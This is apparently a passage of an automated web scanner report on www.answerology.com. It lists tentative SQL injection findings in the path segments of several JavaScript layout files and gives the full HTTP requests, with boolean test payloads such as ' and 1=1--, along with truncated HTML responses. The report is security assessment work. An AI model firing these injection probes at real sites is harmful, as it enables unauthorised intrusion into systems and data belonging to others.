...[SNIP]...
<link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=698584103" />
<link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v=698584103" />
<script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6.min.js"></script>
<script type="text/javascript" src="/cssjs/jquery.form.js"></script>
<script type="text/javascript" src="/cssjs/jquery.validate.min.js"></script>
<script type="text/javascript" src="/fckeditor/fckeditor.js"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/UserReferrerGetter.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CharacterCounter.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v=698584103"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout.js?v=698584103"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/KnightRidderLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/countdownTimer.js?v=698584103"></script>

<script language="JavaScript" type="text/javascript" src="/cobrands/marieclaire/MarieClaireLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag/RedbookmagLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmopolitan/CosmopolitanLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/seventeen/SeventeenLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/goodhousekeeping/GoodhousekeepingLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmogirl/Cosm
...[SNIP]...

Request 2

GET /?1%20and%201%3d2--%20=1 HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://hearst.com/newspapers/metrix4media.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:27:27 GMT
Content-Length: 58840
Connection: close
Cache-Control: no-cache
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>Relationship Advice - Get Answers to Relationship Questions</title>
<meta name="
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=1648503221" />
<link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v=1648503221" />
<script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6.min.js"></script>
<script type="text/javascript" src="/cssjs/jquery.form.js"></script>
<script type="text/javascript" src="/cssjs/jquery.validate.min.js"></script>
<script type="text/javascript" src="/fckeditor/fckeditor.js"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/UserReferrerGetter.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CharacterCounter.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v=1648503221"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout.js?v=1648503221"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/KnightRidderLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/countdownTimer.js?v=1648503221"></script>

<script language="JavaScript" type="text/javascript" src="/cobrands/marieclaire/MarieClaireLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag/RedbookmagLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmopolitan/CosmopolitanLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/seventeen/SeventeenLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/goodhousekeeping/GoodhousekeepingLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands
...[SNIP]...
1.23. http://www.answerology.com/cobrands/cosmogirl/CosmogirlLayout.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.answerology.com
Path:   /cobrands/cosmogirl/CosmogirlLayout.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /cobrands'%20and%201%3d1--%20/cosmogirl/CosmogirlLayout.js?v=698584103 HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Content-Length: 10403
Date: Sat, 17 Sep 2011 16:27:50 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>Answerology Error</title>
<meta name="title" content="Answerology Error" />
<met
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=1648503221" />
<link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v=1648503221" />
<script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6.min.js"></script>
<script type="text/javascript" src="/cssjs/jquery.form.js"></script>
<script type="text/javascript" src="/cssjs/jquery.validate.min.js"></script>
<script type="text/javascript" src="/fckeditor/fckeditor.js"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/UserReferrerGetter.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CharacterCounter.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v=1648503221"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout.js?v=1648503221"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/KnightRidderLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/countdownTimer.js?v=1648503221"></script>

<script language="JavaScript" type="text/javascript" src="/cobrands/marieclaire/MarieClaireLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag/RedbookmagLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmopolitan/CosmopolitanLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/seventeen/SeventeenLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/goodhousekeeping/GoodhousekeepingLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands
...[SNIP]...

Request 2

GET /cobrands'%20and%201%3d2--%20/cosmogirl/CosmogirlLayout.js?v=698584103 HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Content-Length: 10382
Date: Sat, 17 Sep 2011 16:27:50 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>Answerology Error</title>
<meta name="title" content="Answerology Error" />
<met
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=516689755" />
<link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v=516689755" />
<script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6.min.js"></script>
<script type="text/javascript" src="/cssjs/jquery.form.js"></script>
<script type="text/javascript" src="/cssjs/jquery.validate.min.js"></script>
<script type="text/javascript" src="/fckeditor/fckeditor.js"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/UserReferrerGetter.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CharacterCounter.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v=516689755"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout.js?v=516689755"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/KnightRidderLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/countdownTimer.js?v=516689755"></script>

<script language="JavaScript" type="text/javascript" src="/cobrands/marieclaire/MarieClaireLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag/RedbookmagLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmopolitan/CosmopolitanLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/seventeen/SeventeenLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/goodhousekeeping/GoodhousekeepingLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmogirl/Cosm
...[SNIP]...
1.24. http://www.answerology.com/cobrands/cosmopolitan/CosmopolitanLayout.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.answerology.com
Path:   /cobrands/cosmopolitan/CosmopolitanLayout.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /cobrands'%20and%201%3d1--%20/cosmopolitan/CosmopolitanLayout.js?v=698584103 HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Content-Length: 10382
Date: Sat, 17 Sep 2011 16:27:46 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>Answerology Error</title>
<meta name="title" content="Answerology Error" />
<met
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=516689755" />
<link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v=516689755" />
<script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6.min.js"></script>
<script type="text/javascript" src="/cssjs/jquery.form.js"></script>
<script type="text/javascript" src="/cssjs/jquery.validate.min.js"></script>
<script type="text/javascript" src="/fckeditor/fckeditor.js"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/UserReferrerGetter.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CharacterCounter.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v=516689755"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout.js?v=516689755"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/KnightRidderLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/countdownTimer.js?v=516689755"></script>

<script language="JavaScript" type="text/javascript" src="/cobrands/marieclaire/MarieClaireLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag/RedbookmagLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmopolitan/CosmopolitanLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/seventeen/SeventeenLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/goodhousekeeping/GoodhousekeepingLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmogirl/Cosm
...[SNIP]...

Request 2

GET /cobrands'%20and%201%3d2--%20/cosmopolitan/CosmopolitanLayout.js?v=698584103 HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Content-Length: 10403
Date: Sat, 17 Sep 2011 16:27:46 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>Answerology Error</title>
<meta name="title" content="Answerology Error" />
<met
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=1648503221" />
<link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v=1648503221" />
<script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6.min.js"></script>
<script type="text/javascript" src="/cssjs/jquery.form.js"></script>
<script type="text/javascript" src="/cssjs/jquery.validate.min.js"></script>
<script type="text/javascript" src="/fckeditor/fckeditor.js"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/UserReferrerGetter.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CharacterCounter.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v=1648503221"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout.js?v=1648503221"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/KnightRidderLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/countdownTimer.js?v=1648503221"></script>

<script language="JavaScript" type="text/javascript" src="/cobrands/marieclaire/MarieClaireLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag/RedbookmagLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmopolitan/CosmopolitanLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/seventeen/SeventeenLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/goodhousekeeping/GoodhousekeepingLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands
...[SNIP]...
1.25. http://www.answerology.com/cobrands/cosmopolitan/CosmopolitanLayout.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.answerology.com
Path:   /cobrands/cosmopolitan/CosmopolitanLayout.js

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /cobrands/cosmopolitan/CosmopolitanLayout.js'%20and%201%3d1--%20?v=698584103 HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Content-Length: 10403
Date: Sat, 17 Sep 2011 16:27:55 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>Answerology Error</title>
<meta name="title" content="Answerology Error" />
<met
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=1648503221" />
<link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v=1648503221" />
<script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6.min.js"></script>
<script type="text/javascript" src="/cssjs/jquery.form.js"></script>
<script type="text/javascript" src="/cssjs/jquery.validate.min.js"></script>
<script type="text/javascript" src="/fckeditor/fckeditor.js"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/UserReferrerGetter.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CharacterCounter.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v=1648503221"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout.js?v=1648503221"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/KnightRidderLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/countdownTimer.js?v=1648503221"></script>

<script language="JavaScript" type="text/javascript" src="/cobrands/marieclaire/MarieClaireLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag/RedbookmagLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmopolitan/CosmopolitanLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/seventeen/SeventeenLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/goodhousekeeping/GoodhousekeepingLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands
...[SNIP]...

Request 2

GET /cobrands/cosmopolitan/CosmopolitanLayout.js'%20and%201%3d2--%20?v=698584103 HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Content-Length: 10382
Date: Sat, 17 Sep 2011 16:27:55 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>Answerology Error</title>
<meta name="title" content="Answerology Error" />
<met
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=698584103" />
<link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v=698584103" />
<script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6.min.js"></script>
<script type="text/javascript" src="/cssjs/jquery.form.js"></script>
<script type="text/javascript" src="/cssjs/jquery.validate.min.js"></script>
<script type="text/javascript" src="/fckeditor/fckeditor.js"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/UserReferrerGetter.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CharacterCounter.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v=698584103"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout.js?v=698584103"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/KnightRidderLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/countdownTimer.js?v=698584103"></script>

<script language="JavaScript" type="text/javascript" src="/cobrands/marieclaire/MarieClaireLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag/RedbookmagLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmopolitan/CosmopolitanLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/seventeen/SeventeenLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/goodhousekeeping/GoodhousekeepingLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmogirl/Cosm
...[SNIP]...
1.26. http://www.answerology.com/cobrands/goodhousekeeping/GoodhousekeepingLayout.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.answerology.com
Path:   /cobrands/goodhousekeeping/GoodhousekeepingLayout.js

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 34982982'%20or%201%3d1--%20 and 34982982'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /cobrands/goodhousekeeping/GoodhousekeepingLayout.js34982982'%20or%201%3d1--%20?v=698584103 HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Content-Length: 10403
Date: Sat, 17 Sep 2011 16:27:55 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>Answerology Error</title>
<meta name="title" content="Answerology Error" />
<met
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=1648503221" />
<link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v=1648503221" />
<script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6.min.js"></script>
<script type="text/javascript" src="/cssjs/jquery.form.js"></script>
<script type="text/javascript" src="/cssjs/jquery.validate.min.js"></script>
<script type="text/javascript" src="/fckeditor/fckeditor.js"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/UserReferrerGetter.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CharacterCounter.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v=1648503221"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout.js?v=1648503221"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/KnightRidderLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/countdownTimer.js?v=1648503221"></script>

<script language="JavaScript" type="text/javascript" src="/cobrands/marieclaire/MarieClaireLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag/RedbookmagLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmopolitan/CosmopolitanLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/seventeen/SeventeenLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/goodhousekeeping/GoodhousekeepingLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands
...[SNIP]...

Request 2

GET /cobrands/goodhousekeeping/GoodhousekeepingLayout.js34982982'%20or%201%3d2--%20?v=698584103 HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Content-Length: 10382
Date: Sat, 17 Sep 2011 16:27:56 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: -1
Pragma: no-cache

